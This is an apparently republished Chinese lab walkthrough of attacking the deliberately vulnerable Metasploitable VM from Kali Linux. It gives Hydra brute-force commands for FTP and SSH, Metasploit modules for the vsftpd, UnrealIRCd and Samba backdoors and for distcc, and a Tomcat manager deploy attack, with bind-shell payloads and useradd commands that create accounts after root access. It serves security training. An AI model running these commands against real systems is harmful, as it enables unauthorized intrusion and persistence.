手把手教你kali渗透Metasploitable

这篇具有很好参考价值的文章主要介绍了手把手教你kali渗透Metasploitable。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

记一次kali渗透Metasploitbale靶机

1.网络设置

手把手教你kali渗透Metasploitable

2.ifconfig查看Metasploitable的IP:

手把手教你kali渗透Metasploitable

3.对Metasploitbale进行nmap端口扫描:

Nmap 192.168.22.128

手把手教你kali渗透Metasploitable

端口爆破:FTP、SSH等

工具:Hydra

备用字典:user.txt: 手把手教你kali渗透Metasploitable

pass,txt: 手把手教你kali渗透Metasploitable

一、 爆破FTP

手把手教你kali渗透Metasploitable

hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt  ftp://192.168.22.128

//注意路径是桌面还是Desktop

手把手教你kali渗透Metasploitable

二、 爆破SSH

hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt 192.168.22.128 ssh

手把手教你kali渗透Metasploitable

利用爆破得到的用户名和密码,进行远程连接测试:

手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

成功连接:

手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

三、端口渗透:

利用metasploit 然后在kali linux中进行渗透:

启动msf msfconsole

手把手教你kali渗透Metasploitable

1.端口1: 1524—ingrelock_backdoor

利用telnet连接1524,直接返回root会话

手把手教你kali渗透Metasploitable

创建用户ss

手把手教你kali渗透Metasploitable
成功:
手把手教你kali渗透Metasploitable

2.端口2、1099—distcc程序漏洞—ingrelock

利用metasploit并设置靶机ip进行爆破
手把手教你kali渗透Metasploitable

报错,提示未设置payload:

手把手教你kali渗透Metasploitable

设置payload:

 set payload cmd/unix/bind_perl

获取到daemon权限:

手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

3.端口3、139—samba为3.0漏洞

先用nmap进行详细扫描

 nmap -v -A -T4 192.168.22.128

手把手教你kali渗透Metasploitable

再用scanner模块进行端口扫描

手把手教你kali渗透Metasploitable

全端口版本检测:

nmap -sV 192.168.22.128

手把手教你kali渗透Metasploitable

发现Samba

利用metasploit

手把手教你kali渗透Metasploitable

利用 exploit/multi/samba/usermap_script

手把手教你kali渗透Metasploitable

Set rhost 192.168.22.128  //设置靶机ip
Exploit

输入whoami,可以看到已经获取到root权限。
手把手教你kali渗透Metasploitable

useradd -m ht -p ht   // 创建用户名为ht的用户

手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

4.端口4: 6667—irc_3281_backdoor

登录msf ,search irc 找到对应得模块

手把手教你kali渗透Metasploitable

利用该模块exploit/unix/irc/unreal_ircd_3281_backdoor

use exploit/unix/irc/unreal_ircd_3281_backdoor
Show options

手把手教你kali渗透Metasploitable

设置靶机名 进行漏洞利用 exploit ,

未成功,提示A payload has not been selected
手把手教你kali渗透Metasploitable

设置payload:

set payload cmd/unix/bind_perl

成功获取root权限
手把手教你kali渗透Metasploitable

创建用户aa

手把手教你kali渗透Metasploitable手把手教你kali渗透Metasploitable

5.端口5 6200—vsftpd_234_backdoor

利用metasploit 找到利用模块

手把手教你kali渗透Metasploitable

利用该模块:

use exploit/unix/ftp/vsftpd_234_backdoor  
show options

手把手教你kali渗透Metasploitable

设置靶机名,进行漏洞利用

获取到root权限

手把手教你kali渗透Metasploitable

useradd -m ht1 -p aa  //创建用户ht1

手把手教你kali渗透Metasploitable
手把手教你kali渗透Metasploitable

6.端口6:8180—Apache Tomcat弱口令

在终端中输入命令“nmap –sV 192.168.22.128”,对目标主机进行端口扫描,发现开放8180端口并且运行 着ApacheTomcat/CoyoteJSP engine1.1。

手把手教你kali渗透Metasploitable
利用该模块:

search tomcat   //搜索tomcat的相关工具和攻击载荷
use auxiliary/scanner/http/tomcat_mgr_login  //启用漏洞利用模块, 提示符就会提示进入到该路径下

手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

set rhost 192.168.22.128    //设置攻击目标主机IP
set rport 8180     //设置攻击目标主机端口号
exploit   //实施攻击

获得用户名tomcat,密码tomcat。

手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

也可用另一种方式获取到tomcat用户名和密码(这里不做展示):使用use auxiliary/scanner/http/tomcat_mgr_login进行账户爆破 用默认自带的字典即可,如果用桌面上字典 则需要设置set PASS_FILE ‘root/Desktop/password.txt’ & set USER_FILE ‘root/Desktop/user.txt’,然后设置主机名和端口(同上)->show options->run即可。

获取到用户名和密码后使用deploy模块进行攻击:

手把手教你kali渗透Metasploitable

 use exploit/multi/http/tomcat_mgr_deploy

报错:

手把手教你kali渗透Metasploitable

查看payloads

手把手教你kali渗透Metasploitable

设置payload:
手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

设置靶机ip和端口以及用户名和密码

手把手教你kali渗透Metasploitable成功获取到tomcat会话:

手把手教你kali渗透Metasploitable

手把手教你kali渗透Metasploitable

也可以如下图设置:

手把手教你kali渗透Metasploitable
**如果对你有帮助的话,希望可以点赞、收藏或关注哦! **文章来源地址https://www.toymoban.com/news/detail-462906.html

到了这里,关于手把手教你kali渗透Metasploitable的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 手把手教你落地DDD

    一、前言 常见的DDD实现架构有很多种,如经典四层架构、六边形(适配器端口)架构、整洁架构(Clean Architecture)、CQRS架构等。架构无优劣高下之分,只要熟练掌握就都是合适的架构。本文不会逐个去讲解这些架构,感兴趣的读者可以自行去了解。 本文将带领大家从日常的

    2024年02月16日
    浏览(54)
  • 手把手教你实战TDD

    领域驱动设计,测试驱动开发。 我们在《手把手教你落地DDD》一文中介绍了领域驱动设计(DDD)的落地实战,本文将对测试驱动开发(TDD)进行探讨,主要内容有:TDD基本理解、TDD常见误区、TDD技术选型,以及案例实战。希望通过本文,读者能够理解掌握TDD并将其应用于实际

    2024年02月08日
    浏览(51)
  • 手把手教你做主成分分析

    主成分分析是一种降维处理的统计方法,实践中有三个应用场景: 信息浓缩:将多个分析项浓缩成几个关键概括性指标; 权重计算:利用方差解释率值计算各概括性指标的权重; 综合评价:基于主成分得分构造综合得分数据,用于综合评价。 接下来,以一个具体案例来学习

    2024年02月01日
    浏览(61)
  • 手把手教你用代码画架构图

    作者:京东物流 覃玉杰 本文将给大家介绍一种简洁明了软件架构可视化模型——C4模型,并手把手教大家如何使用 代码 绘制出精美的C4架构图。 阅读本文之后,读者画的架构图将会是这样的: 注:该图例仅作绘图示例使用,不确保其完整性、可行性。 C4是软件架构可视化

    2024年02月04日
    浏览(53)
  • 手把手教你彻底卸载MySQL

    ❤写在前面 ❤博客主页: 努力的小鳴人 ❤系列专栏: MySQL8.0基础学习 ❤欢迎小伙伴们, 点赞👍关注🔎收藏🍔 一起学习! ❤如有错误的地方,还请小伙伴们指正!🌹 ​ 目录 步骤1:停止MySQL服务 步骤2:软件的卸载 步骤3:残余文件的清理 步骤4:清理注册表 步骤5:删除

    2024年02月05日
    浏览(43)
  • 手把手教你爬取网站信息

    如题,理解这一部分需要一定的Python基础,有些代码我不做详细解释了,但是用这个方法是确实可以爬到的。 1. 在抓包⼯具中先定位到和浏览器地址栏的⽹址⼀样的数据包 ①在页面中右击鼠标,点击检查,博主这里用的是Google浏览器 ②在弹出来的页面中点击Network,然后再重

    2024年02月02日
    浏览(42)
  • 手把手教你绘制小程序海报

    海报分享功能在许多应用中应该是很常见的,因为它作为一种常用的应用推广和拉新的方式。 接下来看个实际的案例,如下: 把任务拆解下: 如何绘制海报 如何把绘制后的海报保存到相册 用 canvas 来绘制海报。 这里需要了解基本的 canvas api ,不熟悉可以先去了解下相关

    2024年02月04日
    浏览(53)
  • 手把手教你反编译小程序

    操作系统: win10 10.0.19042 node: v14.17.0 微信开发者工具: Stable 1.05.2110290 在电脑端安装模拟器工具,这里以夜神模拟器为例, 在模拟器中安装微信:用于微信打开小程序时加载小程序包。 在模拟器中文件管理器:用于查看小程序包,这里使用模拟器自带的Amaze。 文件共享路径:可

    2024年02月08日
    浏览(43)
  • 手把手教你Linux的网络配置

    目录 网络连接测试 测试Linux虚拟机是否与主机连接 测试主机是否与虚拟机连接 网络连接模式 桥接模式 NAT模式 仅主机模式 修改静态IP 修改 IP 地址后可能会遇到的问题 配置主机名 测试Linux虚拟机是否与主机连接 首先可以在windows界面,windows + R键输出cmd打开命令行,输入  

    2024年02月03日
    浏览(55)
  • 手把手教你怎么写顺序表

    目录 一、顺序表有什么功能? 二、实现顺序表的各个功能 1.前置准备 2.初始化顺序表 3.顺序表扩容 4.打印顺序表 5.增加顺序表成员 5.1尾增 5.2头增  6.删除顺序表中成员的内容 6.1尾删 6.2头删  7.查找成员  8.修改(替换) 9.插入(在目标位置插入成员) 10.定向删除(将目标位置的成

    2024年02月15日
    浏览(66)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包